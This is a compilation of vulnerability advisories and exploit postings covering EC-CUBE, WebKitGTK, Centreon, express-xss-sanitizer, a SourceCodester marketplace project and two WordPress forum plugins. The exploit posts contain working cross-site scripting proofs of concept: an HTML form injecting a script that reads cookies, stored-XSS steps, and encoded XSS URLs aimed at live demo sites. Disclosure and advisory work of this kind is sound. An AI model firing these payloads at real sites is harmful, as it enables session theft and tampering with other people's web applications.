Directory traversal vulnerability in EC-CUBE 3 series (EC-CUBE 3.0.0 to 3.0.18-p4 ) and EC-CUBE 4 series (EC-CUBE 4.0.0 to 4.1.2) allows a remote authenticated attacker with an administrative privilege to obtain the product's directory structure information.

Published:2022/09/15  Last Updated:2022/09/20

**Overview**

EC-CUBE provided by EC-CUBE CO.,LTD. contains multiple vulnerabilities.

**Products Affected**

**CVE-2022-40199**

*   EC-CUBE 3.0.0 to 3.0.18-p4 (EC-CUBE 3 series)
*   EC-CUBE 4.0.0 to 4.1.2 (EC-CUBE 4 series)

**CVE-2022-38975**

*   EC-CUBE 4.0.0 to 4.1.2 (EC-CUBE 4 series)

**Description**

EC-CUBE provided by EC-CUBE CO.,LTD. contains multiple vulnerabilities listed below.

*   **Directory traversal vulnerability (CWE-22)** - CVE-2022-40199
    
    CVSS v3
    
    CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N
    
    **Base Score: 2.7**
    
    CVSS v2
    
    AV:N/AC:L/Au:S/C:P/I:N/A:N
    
    **Base Score: 4.0**
    
*   **DOM-based cross-site scripting vulnerability (CWE-79)** - CVE-2022-38975
    
    CVSS v3
    
    CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    
    **Base Score: 6.1**
    
    CVSS v2
    
    AV:N/AC:H/Au:N/C:N/I:P/A:N
    
    **Base Score: 2.6**
    

**Impact**

*   A remote attacker who can log in to the product may obtain the product's directory structure information - CVE-2022-40199
*   If a remote attacker leads an administrator of the product to a specially crafted page and to perform a specific operation, an arbitrary script may be executed on the administrator's web browser - CVE-2022-38975

**Solution**

**Update the software**  
An update is available for EC-CUBE 4 series.  
Update to the latest version according to the information provided by the developer.  
For EC-CUBE 3 series, there is no update but a patch is available.

**Apply the patch**  
Patches are available for both EC-CUBE 3 and EC-CUBE 4 series.  
For more information, refer to the information provided by the developer.

**Vendor Status**

**References**

**JPCERT/CC Addendum**

**Vulnerability Analysis by JPCERT/CC**

**Credit**

Noriaki Iwasaki of Cyber Defense Institute, Inc. reported these vulnerabilities to EC-CUBE CO.,LTD. and EC-CUBE CO.,LTD. reported them to JPCERT/CC to notify users of the solutions through JVN.

**Other Information**

**Update History**

2022/09/20

Information under the section \[Credit\] was updated.

2022/09/20

EC-CUBE CO.,LTD. update status

CVE-2022-40199: JVN#21213852: Multiple vulnerabilities in EC-CUBE

Ubuntu Security Notice 5642-1 - Several security issues were discovered in the WebKitGTK Web and JavaScript engines. If a user were tricked into viewing a malicious website, a remote attacker could exploit a variety of issues related to web browser security, including cross-site scripting attacks, denial of service attacks, and arbitrary code execution.

    ==========================================================================Ubuntu Security Notice USN-5642-1September 26, 2022webkit2gtk vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.04 LTS- Ubuntu 20.04 LTSSummary:Several security issues were fixed in WebKitGTK.Software Description:- webkit2gtk: Web content engine library for GTK+Details:Several security issues were discovered in the WebKitGTK Web and JavaScriptengines. If a user were tricked into viewing a malicious website, a remoteattacker could exploit a variety of issues related to web browser security,including cross-site scripting attacks, denial of service attacks, andarbitrary code execution.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.04 LTS:  libjavascriptcoregtk-4.0-18     2.36.8-0ubuntu0.22.04.1  libjavascriptcoregtk-4.1-0      2.36.8-0ubuntu0.22.04.1  libwebkit2gtk-4.0-37            2.36.8-0ubuntu0.22.04.1  libwebkit2gtk-4.1-0             2.36.8-0ubuntu0.22.04.1Ubuntu 20.04 LTS:  libjavascriptcoregtk-4.0-18     2.36.8-0ubuntu0.20.04.1  libwebkit2gtk-4.0-37            2.36.8-0ubuntu0.20.04.1This update uses a new upstream release, which includes additional bugfixes. After a standard system update you need to restart any applicationsthat use WebKitGTK, such as Epiphany, to make all the necessary changes.References:  https://ubuntu.com/security/notices/USN-5642-1  CVE-2022-32886Package Information:  https://launchpad.net/ubuntu/+source/webkit2gtk/2.36.8-0ubuntu0.22.04.1  https://launchpad.net/ubuntu/+source/webkit2gtk/2.36.8-0ubuntu0.20.04.1

Ubuntu Security Notice USN-5642-1

Online Birth Certificate Management System version 1.0 suffers from a cross site scripting vulnerability.

    # Exploit Title: Online Birth Certificate Management System - Cross Site Scripting (XSS) Reflected POST# Google Dork: N/A# Date: 2022-9-27# Exploit Author: yousef alraddadi - https://twitter.com/y0usef_11# Vendor Homepage: https://www.sourcecodester.com/php/15683/online-birth-certificate-management-system-php-free-download.html# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/OBCMS.zip# Tested on: windows 11 - XAMPP# CVE : N/A# Version: 1.0# no token in update profile admin<html>    <head>        <title> search recoder </title>    </head>    <body>        <form action="http://localhost/OBCMS/admin/search.php" method="post" enctype="multipart/form-data">            <input type="hidden" name="searchdata" value="<script>alert(document.cookie);</script>">            <button class="btn btn-sm btn-primary login-submit-cs" type="submit" name="search">search</button>        </form>    </body></html></html>

Online Birth Certificate Management System 1.0 Cross Site Scripting

Online Birth Certificate Management System version 1.0 suffers from a persistent cross site scripting vulnerability.

**Online Birth Certificate Management System 1.0 Cross Site Scripting**

Posted Sep 27, 2022

Authored by Yousef Alraddadi

Online Birth Certificate Management System version 1.0 suffers from a persistent cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 7e9852e1ba3b10ed9809857eace8d6e330d1f9d7306d8b2d80c0851d85229f86

Download | Favorite | View

**Online Birth Certificate Management System 1.0 Cross Site Scripting**

    # Exploit Title: Online Birth Certificate Management System - Stored Cross-Site Scripting (XSS)# Google Dork: N/A# Date: 2022-9-27# Exploit Author: yousef alraddadi - https://twitter.com/y0usef_11# Vendor Homepage: https://www.sourcecodester.com/php/15683/online-birth-certificate-management-system-php-free-download.html# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/OBCMS.zip# Tested on: windows 11 - XAMPP# CVE : N/A# Version: 1.0Vulnerability Details======================Steps :1) Log in to the application after register new userUsername: testPassword: 123452) Navigate to Birth Reg Form and Click on Add Details.3) add full name payload => <script>alert(document.cookie);</script>4) and all field enter payload only Contact Number enter number

**File Tags**

*   ActiveX (932)
*   Advisory (78,276)
*   Arbitrary (15,276)
*   BBS (2,859)
*   Bypass (1,598)
*   CGI (1,013)
*   Code Execution (6,771)
*   Conference (671)
*   Cracker (799)
*   CSRF (3,277)
*   DoS (22,065)
*   Encryption (2,340)
*   Exploit (50,129)
*   File Inclusion (4,160)
*   File Upload (945)
*   Firewall (821)
*   Info Disclosure (2,565)
*   Intrusion Detection (861)
*   Java (2,823)
*   JavaScript (808)
*   Kernel (6,156)
*   Local (14,093)
*   Magazine (586)
*   Overflow (12,252)
*   Perl (1,413)
*   PHP (5,057)
*   Proof of Concept (2,284)
*   Protocol (3,350)
*   Python (1,406)
*   Remote (29,862)
*   Root (3,466)
*   Ruby (581)
*   Scanner (1,630)
*   Security Tool (7,737)
*   Shell (3,077)
*   Shellcode (1,203)
*   Sniffer (883)
*   Spoof (2,123)
*   SQL Injection (16,057)
*   TCP (2,369)
*   Trojan (682)
*   UDP (872)
*   Virus (660)
*   Vulnerability (30,657)
*   Web (9,114)
*   Whitepaper (3,723)
*   x86 (943)
*   XSS (17,396)
*   Other

**File Archives**

*   September 2022
*   August 2022
*   July 2022
*   June 2022
*   May 2022
*   April 2022
*   March 2022
*   February 2022
*   January 2022
*   December 2021
*   November 2021
*   October 2021
*   Older

**Systems**

*   AIX (426)
*   Apple (1,899)
*   BSD (369)
*   CentOS (55)
*   Cisco (1,915)
*   Debian (5,948)
*   Fedora (1,690)
*   FreeBSD (1,242)
*   Gentoo (4,207)
*   HPUX (878)
*   iOS (323)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (42,923)
*   Mac OS X (684)
*   Mandriva (3,105)
*   NetBSD (255)
*   OpenBSD (478)
*   RedHat (12,009)
*   Slackware (941)
*   Solaris (1,607)
*   SUSE (1,444)
*   Ubuntu (8,027)
*   UNIX (9,115)
*   UnixWare (185)
*   Windows (6,473)
*   Other

The package express-xss-sanitizer before 1.1.3 is vulnerable to Prototype Pollution via the `allowedTags` attribute, allowing the attacker to bypass xss sanitization.

**express-xss-sanitizer vulnerable to Prototype Pollution via allowedTags attribute**

Moderate severity GitHub Reviewed Published Sep 27, 2022 • Updated Sep 30, 2022

GHSA-grjp-4jmr-mjcw: express-xss-sanitizer vulnerable to Prototype Pollution via allowedTags attribute

Centreon v20.10.18 was discovered to contain a cross-site scripting (XSS) vulnerability via the `esc_name` (Escalation Name) parameter at `Configuration/Notifications/Escalations`. This vulnerability allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload. Versions 21.04.16, 21.10.8, and 22.04.2 contain patches.

**Package**

composer centreon/centreon (Composer)

**Affected versions**

< 21.04.16

\>= 21.10.0, < 21.10.8

\>= 22.0.0, < 22.04.1

**Patched versions**

21.04.16

21.10.8

22.04.1

GHSA-rv5q-72p2-2q24: Centreon contains cross-site scripting vulnerability via esc_name parameter

Sourcecodester Online Market Place Site 1.0 is vulnerable to Cross Site Scripting (XSS), allowing attackers to register as a Seller then create new products containing XSS payloads in the 'Product Title' and 'Short Description' fields.

Submitted by oretnom23 on Tuesday, April 12, 2022 - 17:21.

****Introduction****

This simple project is an **Online Market Place Site in PHP**. This is a web-based application project developed in **PHP** and **MySQL Database**. This project is an online platform that allows sellers to publish their selling items. This simple site was inspired by the Facebook Market Place feature where sellers can even sell used items. The application has a pleasant user interface using the **Bootstrap v5 Framework** and **Material Kit Template**. It also consists of user-friendly features and functionalities.

****About the Online Market Place Site in PHP****

I developed this project using the following:

*   **XAMPP v3.3.0**
*   **PHP**
*   **MySQL Database**
*   **HTML**
*   **CSS**
*   **JavaScript**
*   **Ajax**
*   **jQuery**
*   **Bootstrap**
*   **Google Material Icon**
*   **Material Kit 2 Template**

This **Online Market Place Site in PHP** is composed of 3 User Interfaces which are the **Admin Panel**, **Seller Panel**, and **Public Site**. The **Admin Panel** is the side of the system where the system management can manage all the project data. **Admin Users** have the privilege to access and manage all the products or items that the seller published. They can also manage the list of users where they can update and delete sellers' data. The **Seller Panel** is the side of the system where the seller can manage their published items. The seller can add images and some information about the product that they are selling such as the item's specifications. They can set the quantity or stock that they have in each item they published. On the **Public Site**, site visitors or anonymous users can search for their desired product to check if someone posted a product that they wanted. Users can list all the available products and view each item's details. The posted product details also contain or display the seller's basic information and links where the possible buyer can contact them.

****Features********Admin-Side****

*   **Home Page**
    *   Display the summary of the list.
*   **Category Management**
    *   Add New Category
    *   List All Categories
    *   View Category Details
    *   Edit Category Details
    *   Delete Category Details
*   **User Management**
    *   Add New User
    *   List All Users
    *   View User Details
    *   Edit User Details
    *   Reset User Password
    *   Delete User Details
*   **Product Management**
    *   List All Products
    *   View Product Details
    *   Edit Product Details
    *   Delete Product Details
*   **Update System Information**
*   **Update Account Details/Credentials**
*   **Login and Logout**

****Seller-Side****

*   **Home Page**
    *   Display the summary of the list.
*   **Product Management**
    *   Add New Product
    *   List All Products
    *   View Product Details
    *   Edit Product Details
    *   Delete Product Details
*   **Update Account and Contact Details/Credentials**
*   **Login and Logout**

****Public-Side****

*   **Home Page**
    *   Display the Welcome Content.
*   **'About Us' Content**
*   **List All Available Products**
*   **View Product Details**
*   **Redirect to Seller's Website**
*   **Redirect to Seller's FB Page**
*   **Get Seller's Contact Details**
*   **Search Product**

The source code was developed only for educational purposes only. You can download the source code for free and modify it the way you wanted.

**System Snapshots of some Features******Public Site****

****Product List (Public-Side)****

****Product Details****

****Seller Registration Form****

****Seller Panel****

****Admin Panel****

**How to Run ??**

****Requirements****

*   **Download** and **Install** any **local web server** such as **XAMPP.**
*   **Download** the provided source code **zip** file. (_download button is located below_)
*   **Download** the project assets at https://www.dropbox.com/s/uc5o9fr9ejpeg5d/php\_omps\_assets.zip?dl=1

****System Installation/Setup****

1.  **Enable** the **GD Library** in your **php.ini** file.
2.  **Open** your **XAMPP Control Panel** and start ****Apache**** and ****MySQL****.
3.  **Extract** the **downloaded source code **zip** file**.
4.  **Copy** the extracted source code folder and **paste** it into the **XAMPP's "htdocs" directory**.
5.  **Extract** the **downloaded assets **zip** file**.
6.  **Copy** the extracted assets folder and **paste** it into the **source code** root path.
7.  **Browse** the ****PHPMyAdmin**** in a **browser**. i.e. ****http://localhost/phpmyadmin****
8.  **Create** a **new database** naming ****omps\_db****.
9.  **Import** the provided ****SQL**** file. The file is known as ****omps\_db.sql**** located inside the **database** folder.
10.  **Browse** the **Online Market Place Site in PHP** in a **browser**. i.e. ****http://localhost/omps/****.

****Admin Default Access:****

Username: **admin**  
Password: **admin123**

****Sample Seller Access:****

Username: **mcooper**  
Password: **mcooper123**

****DEMO VIDEO****

That's it. You can now explore the features and functionalities of this **Online Market Place Site in** **PHP**. I hope this will help you with what you are looking for and you'll find something useful for your future projects.

Explore more on this website for more **Free Source Codes** and **Tutorials**.

**Enjoy :)**

*   3428 views

CVE-2022-30003: Online Market Place Site in PHP/OOP Free Source Code

Centreon v20.10.18 was discovered to contain a cross-site scripting (XSS) vulnerability via the esc_name (Escalation Name) parameter at Configuration/Notifications/Escalations. This vulnerability allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload.

My name is Daniel França Lima, I’m a penetration tester Jr  and vulnerability researcher at Hakai Offensive Security. In order to help the hacking community, companies and also improve my skills, I periodically look for flaws in market applications with the goal of achieving responsible disclosure. 

Centreon is a system and network asset monitoring solution based on the Nagios standard, being open source, and allowing easy and effective installation and implementation, monitoring and performance management.

**Centreon partners**

When analyzing the application, it was possible to find a sql injection vulnerability in the esc\_name(Escalation Name) parameter located at “Configuration/Notifications/Escalations”.

**About SQL Injection:**

A SQL injection attack consists in manipulating SQL queries via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system and in some cases issue commands to the operating system. SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to affect the execution of predefined SQL commands. With this explanation in mind, we can move on to technical details.

When analyzing the requests, it was possible to notice that it was a blind-sql (a type of SQL Injection attack that asks the database true or false questions and determines the answer based on the applications response) more specifically a time-based attack in which the application’s response time is used. Below is a proof of concept.

It is also possible to exploit Cross-Site Scripting (XSS) in the same field explored for SQLi, thus making it possible to insert malicious javascript into the application..

**About Stored Cross-Site Scripting:**

In the same field mentioned earlier it was possible to find another vulnerability called Cross-Site Scripting (XSS). Cross-site scripting (also known as XSS) is a web security vulnerability that allows an attacker to compromise the interactions that users have with a vulnerable application. It allows an attacker to circumvent the same origin policy, which is designed to segregate different websites from each other. Cross-site scripting vulnerabilities normally allow an attacker to masquerade as a victim user, to carry out any actions that the user is able to perform, and to access any of the user’s data. If the victim user has privileged access within the application, then the attacker might be able to gain full control over all of the application’s functionality and data.

**_Fixed versions:_**

– centreon-web-22.04.1

– centreon-web-21.10.8

– centreon-web-21.04.16

**_Time Line:_**

23-05 – Notified vendor.

24-05 – Vendor acknowledged disclosure.

04-08 – New versions of software released with patches

26-08 – Blog post release

CVE-2022-40044: Centreon SQLi and XSS Vulnerability

WordPress Forym plugin version 1.5.7 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                      [ Exploits ]                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : forym.xyz                                                                  ││  Vendor   : codecanyon.net                                                             ││  Software : Forym 1.5.7 - Modern Discussion Forum for Wordpress                        ││  Vuln Type: Reflected XSS                                                              ││  Method   : GET                                                                        ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                              B4nks-NET irc.b4nks.tk #unix                             ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2022                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘GET parameter 's' is vulnerable to XSShttps://forym.xyz/?s=ax0zq%22%3e%3cscript%3ealert(1)%3c%2fscript%3efkdbh[-] Done

WordPress Forym 1.5.7 Cross Site Scripting

WordPress Sabai Discuss plugin version 1.4.13 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                      [ Exploits ]                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : sabaidiscuss.com                                                           ││  Vendor   : Sabai Discuss                                                              ││  Software : Sabai Discuss - Q&A forum plugin V1.4.13 for WordPress                     ││  Vuln Type: Reflected XSS                                                              ││  Method   : GET                                                                        ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                              B4nks-NET irc.b4nks.tk #unix                             ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2022                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘GET parameter 'field_number[min]' is vulnerable to XSShttps://demo.sabaidiscuss.com/questions?category=77&filter=1&field_number[min]=33lnoiy%22%3e%3cscript%3ealert(1)%3c%2fscript%3epfucnGET parameter 'field_number[max]' is vulnerable to XSShttps://demo.sabaidiscuss.com/questions?category=77&filter=1&field_number[max]=33lnoiy%22%3E%3Cscript%3Ealert(1)%3C%2fscript%3EpfucnGET parameter 'field_range[min]' is vulnerable to XSS https://demo.sabaidiscuss.com/questions?category=77&filter=1&field_range[min]=6dstzy%22%3e%3cscript%3ealert(1)%3c%2fscript%3eyl1zmGET parameter 'field_range[max]' is vulnerable to XSShttps://demo.sabaidiscuss.com/questions?category=77&filter=1&field_range[max]=6dstzy%22%3e%3cscript%3ealert(1)%3c%2fscript%3eyl1zm[-] Done

Tag

#xss